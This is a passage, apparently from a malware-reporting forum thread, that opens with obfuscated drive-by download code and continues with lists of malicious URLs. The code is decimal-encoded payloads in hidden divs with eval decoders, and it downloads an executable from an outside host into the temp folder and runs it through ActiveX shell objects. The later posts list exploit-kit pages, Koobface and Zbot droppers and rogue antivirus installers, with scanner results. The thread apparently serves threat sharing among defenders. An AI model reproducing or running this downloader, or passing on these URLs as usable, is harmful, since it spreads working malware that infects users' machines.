.59.120.46.83.97.118.101.84.111.102.105.108.101.40.102.110.97.109.101.44.50.41.59.115.97.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.102.110.97.109.101.41.59.13.10.114.101.116.117.114.110.32.49.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.70.101.119.40.41.123.13.10.118.97.114.32.105.61.48.59.118.97.114.32.75.95.52.49.75.71.101.119.61.110.101.119.32.65.114.114.97.121.40.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.44.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.48.39.44.39.65.66.57.66.67.69.68.68.45.69.67.55.69.45.52.55.69.49.45.57.51.50.50.45.68.52.65.50.49.48.54.49.55.49.49.54.39.44.39.48.48.48.54.70.48.51.51.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.48.48.48.54.70.48.51.65.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.54.101.51.50.48.55.48.97.45.55.54.54.100.45.52.101.101.54.45.56.55.57.99.45.100.99.49.102.97.57.49.100.50.102.99.51.39.44.39.54.52.49.52.53.49.50.66.45.66.57.55.56.45.52.53.49.68.45.65.48.68.56.45.70.67.70.68.70.51.51.69.56.51.51.67.39.44.39.55.70.53.66.55.70.54.51.45.70.48.54.70.45.52.51.51.49.45.56.65.50.54.45.51.51.57.69.48.51.67.48.65.69.51.68.39.44.39.48.54.55.50.51.69.48.57.45.70.52.67.50.45.52.51.99.56.45.56.51.53.56.45.48.57.70.67.68.49.68.66.48.55.54.54.39.44.39.54.51.57.70.55.50.53.70.45.49.66.50.68.45.52.56.51.49.45.65.57.70.68.45.56.55.52.56.52.55.54.56.50.48.49.48.39.44.39.66.65.48.49.56.53.57.57.45.49.68.66.51.45.52.52.102.57.45.56.51.66.52.45.52.54.49.52.53.52.67.56.52.66.70.56.39.44.39.68.48.67.48.55.68.53.54.45.55.67.54.57.45.52.51.70.49.45.66.52.65.48.45.50.53.70.53.65.49.49.70.65.66.49.57.39.44.39.69.56.67.67.67.68.68.70.45.67.65.50.56.45.52.57.54.98.45.66.48.53.48.45.54.67.48.55.67.57.54.50.52.55.54.66.39.44.110.117.108.108.41.59.13.10.119.104.105.108.101.40.75.95.52.49.75.71.101.119.91.105.93.41.13.10.123.13.10.118.97.114.32.97.61.110.117.108.108.59.13.10.97.61.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.34.111.98.106.101.99.116.34.41.59.13.10.97.46.115.101.116.65.116.116.114.105.98.117.116.101.40.34.99.108.97.115.115.105.100.34.44.34.99.108.115.105.100.58.34.43.75.95.52.49.75.71.101.119.91.105.93.41.59.13.10.105.102.40.97.41.123.116.114.121.123.118.97.114.32.98.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.13.10.105.102.40.98.41.123.105.102.40.75.95.52.49.75.67.101.119.40.97.41.41.114.101.116.117.114.110.32.49.59.125.125.99.97.116.99.104.40.101.41.123.125.125.13.10.105.43.43.59.13.10.125.13.10.125.13.10.105.102.40.75.95.52.49.75.70.101.119.40.41.41.32.115.117.99.99.101.115.115.61.49.59.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("IkZaQm6AojiWK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script><script>
<style>.QIgskwBJjInK_41K{display:none;}</style>
<b class="QIgskwBJjInK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="QIgskwBJjInK_41K" id="QIgskwBJjInK_41K">100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.117.110.101.115.99.97.112.101.40.34.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.118.98.115.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.51.68.51.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.84.121.112.101.66.105.110.97.114.121.37.51.68.49.37.48.68.37.48.65.67.111.110.115.116.37.48.68.37.48.65.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.51.68.50.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.70.83.79.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.83.116.114.101.97.109.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.87.83.104.101.108.108.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.99.66.121.116.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.78.97.109.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.80.114.111.103.37.48.68.37.48.65.79.98.106.78.97.109.101.37.51.68.37.50.50.65.68.79.68.66.37.50.50.37.48.68.37.48.65.79.98.106.80.114.111.103.37.51.68.37.50.50.83.116.114.101.97.109.37.50.50.37.48.68.37.48.65.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.83.101.116.37.50.48.111.83.116.114.101.97.109.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.79.98.106.78.97.109.101.37.50.48.37.50.54.37.50.48.37.50.50.46.37.50.50.37.50.48.37.50.54.37.50.48.79.98.106.80.114.111.103.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.73.102.37.50.48.69.114.114.46.110.117.109.98.101.114.37.50.48.37.51.67.37.51.69.37.50.48.48.37.50.48.84.104.101.110.37.48.68.37.48.65.83.101.116.37.50.48.111.70.83.79.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.83.99.114.105.112.116.105.110.103.46.70.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.108.101.83.121.115.116.101.109.79.98.106.101.99.116.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.83.101.116.37.50.48.80.108.117.103.105.110.70.105.108.101.37.51.68.111.70.83.79.46.67.114.101.97.116.101.84.101.120.116.70.105.108.101.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.37.48.68.37.48.65.84.82.85.69.37.50.57.37.48.68.37.48.65.80.108.117.103.105.110.95.115.105.122.101.37.51.68.76.101.110.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.57.37.48.68.37.48.65.37.48.68.37.48.65.70.111.114.37.50.48.106.37.51.68.49.37.50.48.84.111.37.50.48.80.108.117.103.105.110.95.115.105.122.101.37.48.68.37.48.65.37.50.48.37.50.48.99.66.121.116.101.37.51.68.77.105.100.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.67.106.37.50.67.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.66.121.116.101.67.111.100.101.37.51.68.65.115.99.66.37.50.56.99.66.121.116.101.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.87.114.105.116.101.37.50.56.67.104.114.37.50.56.66.121.116.101.67.111.100.101.37.50.57.37.50.57.37.48.68.37.48.65.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.67.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.83.101.116.37.50.48.111.87.83.104.101.108.108.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.87.83.99.114.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.112.116.46.83.104.101.108.108.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.111.87.83.104.101.108.108.46.82.117.110.37.50.48.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.57.37.50.67.49.37.50.67.70.65.76.83.69.37.48.68.37.48.65.69.108.115.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.77.111.100.101.37.51.68.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.84.121.112.101.37.51.68.97.100.84.121.112.101.66.105.110.97.114.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.79.112.101.110.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.87.114.105.116.101.37.50.48.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.83.97.118.101.84.111.70.105.108.101.37.48.68.37.48.65.37.48.68.37.48.65.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.48.68.37.48.65.37.50.48.119.105.110.100.111.119.46.111.83.104.101.108.108.65.112.112.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.48.68.37.48.65.69.110.100.37.50.48.73.102.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.37.48.68.37.48.65.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.86.66.83.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.111.110.37.50.48.101.114.114.111.114.37.50.48.114.101.115.117.109.101.37.50.48.110.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.108.37.50.48.37.51.68.37.50.48.37.50.50.104.116.116.112.37.51.65.37.50.70.37.50.70.50.51.51.50.52.50.46.99.111.109.37.50.70.49.37.50.70.108.111.97.100.46.112.104.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.100.102.37.50.48.37.51.68.37.50.48.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.37.50.56.37.50.50.111.98.106.101.99.116.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.49.37.51.68.37.50.50.99.108.115.105.100.37.51.65.66.68.57.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.50.37.51.68.37.50.50.67.53.53.54.45.54.53.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.51.37.51.68.37.50.50.51.45.49.49.68.48.45.57.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.52.37.51.68.37.50.50.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.102.117.108.108.37.51.68.99.108.115.49.37.50.54.99.108.115.50.37.50.54.99.108.115.51.37.50.54.99.108.115.52.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.102.46.115.101.116.65.116.116.114.105.98.117.116.101.37.50.48.37.50.50.99.108.97.115.115.105.100.37.50.50.37.50.67.99.108.115.102.117.108.108.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.49.37.51.68.37.50.50.77.105.99.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.50.37.51.68.37.50.50.114.111.115.111.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.51.37.51.68.37.50.50.102.116.46.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.52.37.51.68.37.50.50.88.77.76.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.53.37.51.68.37.50.50.72.84.84.80.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.37.51.68.115.116.114.49.37.50.54.115.116.114.50.37.50.54.115.116.114.51.37.50.54.115.116.114.52.37.50.54.115.116.114.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.120.37.50.48.37.51.68.37.50.48.100.102.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.115.116.114.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.49.37.51.68.37.50.50.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.50.37.51.68.37.50.50.100.111.100.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.51.37.51.68.37.50.50.98.46.83.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.52.37.51.68.37.50.50.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.53.37.51.68.37.50.50.114.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.54.37.51.68.37.50.50.97.109.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.49.37.51.68.97.119.98.49.37.50.54.97.119.98.50.37.50.54.97.119.98.51.37.50.54.97.119.98.52.37.50.54.97.119.98.53.37.50.54.97.119.98.54.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.53.37.51.68.115.116.114.98.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.89.89.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.116.114.98.53.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.116.121.112.101.37.50.48.37.51.68.37.50.48.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.54.37.51.68.37.50.50.71.69.84.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.79.112.101.110.37.50.48.115.116.114.54.37.50.67.37.50.48.100.108.37.50.67.37.50.48.70.97.108.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.83.101.110.100.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.50.102.105.108.101.46.101.120.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.49.37.51.68.37.50.50.83.99.114.105.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.50.37.51.68.37.50.50.116.105.110.103.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.51.37.51.68.37.50.50.46.70.105.108.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.52.37.51.68.37.50.50.101.83.121.115.116.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.53.37.51.68.37.50.50.109.79.98.106.101.99.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.37.51.68.115.99.114.105.112.49.37.50.54.115.99.114.105.112.50.37.50.54.115.99.114.105.112.51.37.50.54.115.99.114.105.112.52.37.50.54.115.99.114.105.112.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.70.70.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.99.114.105.112.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.116.109.112.37.50.48.37.51.68.37.50.48.70.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.37.50.56.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.48.70.70.46.66.117.105.108.100.80.97.116.104.37.50.56.116.109.112.37.50.67.102.110.97.109.101.122.122.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.111.112.101.110.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.119.114.105.116.101.37.50.48.120.46.114.101.115.112.111.110.115.101.66.111.100.121.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.115.97.118.101.116.111.102.105.108.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.99.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.77.77.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.37.50.50.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.77.77.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.37.50.50.37.50.50.37.50.67.37.50.50.37.50.50.37.50.67.37.50.50.111.112.101.110.37.50.50.37.50.67.48.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.34.41.41.59</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("QIgskwBJjInK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script></script>
<style>.M7RtpCTPdGVn6K_41K{display:none;}</style>
<b class="M7RtpCTPdGVn6K_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="M7RtpCTPdGVn6K_41K" id="M7RtpCTPdGVn6K_41K">13.10.100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.111.98.106.101.99.116.32.105.100.61.92.34.75.95.52.49.75.67.56.122.92.34.32.99.108.97.115.115.105.100.61.92.34.99.108.115.105.100.58.123.57.55.65.70.52.65.52.53.45.52.57.66.69.45.52.52.56.53.45.57.70.53.53.45.57.49.65.66.52.48.70.50.56.56.70.50.125.92.34.62.60.47.111.98.106.101.99.116.62.34.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.65.56.122.40.41.13.10.32.123.13.10.32.118.97.114.32.75.95.52.49.75.66.56.122.32.61.32.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.13.10.32.75.95.52.49.75.67.56.122.46.79.112.101.110.87.101.98.70.105.108.101.40.75.95.52.49.75.66.56.122.41.13.10.32.125.13.10.32.75.95.52.49.75.65.56.122.40.41.59.13.10.32</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("M7RtpCTPdGVn6K_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
-
I believe reports to
newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099
http://wepawet.cs.ucsb.edu/view.php?hash=7e2b3bcf078f597a13b9d4f3cf60283c&t=1238957989&type=js
has changed to mabira.net/z/config.bin at the same host.
newsineurope.net/z/config.bin is not available.
-
javacsript.biz/in/in.cgi?2http://wepawet.cs.ucsb.edu/view.php?hash=a85e578048b1a2f6bd32246b5c9ef7b9&t=1238961548&type=js
redirects to exploits at
http://netcorbina.org/in90/
netcorbina.org/in90/iepdf.php?f=newhttp://www.virustotal.com/analisis/e0798c9484695e356ca872fb150410ca 1/40
trojan
http://netcorbina.org/in90/load.phphttp://www.virustotal.com/analisis/f1051127ffaba83b33e3761c455a46c5 2/40
-
rogue:
http://tubeloyaln.com/scan/?id=260
http://winpc-antivirus.com/
exploit/trojan:
http://sykalab.net/inn/index.phphttp://wepawet.iseclab.org/view.php?hash=c8b425b1ef9fb404ee337d4e72d467b6&t=1238959411&type=js
-
These two are quite well detected...
hxxp://put.ghura.pl/81.exe
hxxp://put.ghura.pl/wr.exe
This one isn't very well detected...
hxxp://nemesis.feed.parkingspa.com/NemesisClient.cab
http://www.virustotal.com/analisis/d8f47e014b7190ba7ec12112ea7c5ba8
And the well-known friends from zief.pl once again...
hxxp://zief.pl/iraq.jpg/
http://www.virustotal.com/analisis/7e573eac2d13fbc94bf9d81d2702c140
--->
hxxp://jl.chura.pl/rc/pdf.php?id=456346
http://wepawet.iseclab.org/view.php?hash=c5ec3e0138dd5d5b4d9c204654deb18a&t=1239017754&type=js
Zief.pl crap in attachment as well,password is "infected" as always...
-
exploit
http://www.poshlivse.com/index.phphttp://wepawet.iseclab.org/view.php?hash=92dff88b48386b1b933001ca33b73212&t=1239014786&type=js
trojan
http://www.poshlivse.com/load.phpMD5...: 38970d48df49ca67e06a755350ca9029
http://www.virustotal.com/analisis/ef07a0f7e3e2b1413a9fd591ceede630 2/40
eSafe 7.0.17.0 2009.04.05 Suspicious File
Sophos 4.40.0 2009.04.06 Mal/EncPk-HJ
A compromised site which contains an Iframe to this site is
limitin.dehttp://wepawet.iseclab.org/view.php?hash=cd2389a3c5064493afe100c17c953d11&t=1239015252&type=js
trojan Koobface
79.119.2.227/pid=1000/setup.exe
98.200.26.126/pid=1000/setup.exe
-
Another Koobface...
hxxp://96.35.12.230
hxxp://96.35.12.230/player.swf?pid=6123
hxxp://96.35.12.230/setup.exe
What's kinda interesting actually is the .swf itself...
http://www.virustotal.com/analisis/428b28603b7ef35dfa4b35d85ae65fcc
And after being decompressed also...
http://wepawet.iseclab.org/view.php?hash=c17f6d015c0bc212850fc20e9133e700&type=swf
http://www.virustotal.com/analisis/388afb42ca35d977a980b631b6f7419b
Can't really say it's not to be considered at least as a malware component... :-\
hxxp://61.235.117.70/update.exe
http://www.virustotal.com/analisis/b6d794becce8fad6b6a20a581998dbe1
"It works!" -> is that so? :D
hxxp://usacaaugb.cn/life/iepdf.php?f=new
hxxp://usacaaugb.cn/life/iepdf.php?f=old
hxxp://usacaaugb.cn/life/load.php
hxxp://www.ohtas.biz/stproj/flash.php
Result: 11/40 (27.5%)
http://www.virustotal.com/analisis/809a0e88b7935b661a46fab342169c8a
hxxp://www.vivne.cn/vn.exe
http://www.virustotal.com/analisis/e3ae284eb9482b92f5cd7f09781c451a
http://anubis.iseclab.org/?action=result&task_id=1f8ac8cc0933668946de525e26eae0872&format=html
-
pdf exploit/trojan
famajormusic.ru/jjkj/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=5bb19ee926f1557416d2ee2131adf36e&t=1239040477&type=js
http://www.virustotal.com/analisis/c6087121de76e697622bb78ded6e8e8d 6/40
-
Rogue:
Soldiersoftware.net
Redirect to exploit:
fikalo.dehttp://wepawet.iseclab.org/view.php?hash=a3d3398c25bdc7262e98bd19cdee44c1&t=1239025317&type=js
-
Fake scanners:
http://sys-scan-wiz.org/download.php?page=http://sys-scan-wiz.org/
scanner-wiz-1.com
Avs-online-scan.org
av-lookup.org
Free-web-scaners.net/disk/?code=286
http://am-scan.com/l3/index.html?ref_id=7091
http://am-scan.com/download.php?page=http://am-scan.com/l3/index.html?ref_id=7091
Rogue installers:
http://222.186.9.187/setup.exe
http://www.spy-protector-pro.com/install.exe
http://chorussoft.biz/install.exe
http://webwidesecurity.com/index.php?affid=09400
http://webwidesecurity.com/download.php?affid=00000
fastpayprocess.com -> Pandora Software
Fake codecs:
xviewworldmy2.com/view/1/1220/3
-
exploits/Zbot
jeans0nline.cn/win/index.php?iuBgwPahttp://wepawet.iseclab.org/view.php?hash=2c245804906db1beb7aa12d7d6c18abd&t=1239091219&type=js
http://www.virustotal.com/analisis/fbc3fe9d822e4e95f6118663a438d051 5/40
It is a new Zbot variant which uses new file names.
http://www.threatexpert.com/report.aspx?md5=557c2e0a44e5fa46668383209dc7d65a
-
Few more
http://antiviral-scan-pro.com/11041/3/
http://files.load-pro-antispy.com/normal/setup_11041_3_1.exe
http://goforuniq.com/in.cgi?13&gai=csptop&gli=400&gff=cs_3578123074&al=
http://bonuspromooffer.com/vsm/adv/142/?a=csptop-sst&l=400&f=cs_3578123074&ex=&ed=&h=&sub=csp&prodabbr=3P_UVSM
http://dwnld.bonuspromooffer.com/secure/4f6c9cf2c210fefe73170ddfe8880e38/49db0f09/vsm/vsm_free_setup.exe
http://dwnld.promotion-offer.com/secure/2b686c9bbf54a2803cc230f1a3e6eb1d/49db1161/srm/srm_free_setup.exe
http://www.xp-shield.cn/download.html
-
couple more links
best-av1.info
http://download.best-av1.info/en/PE/install.exe
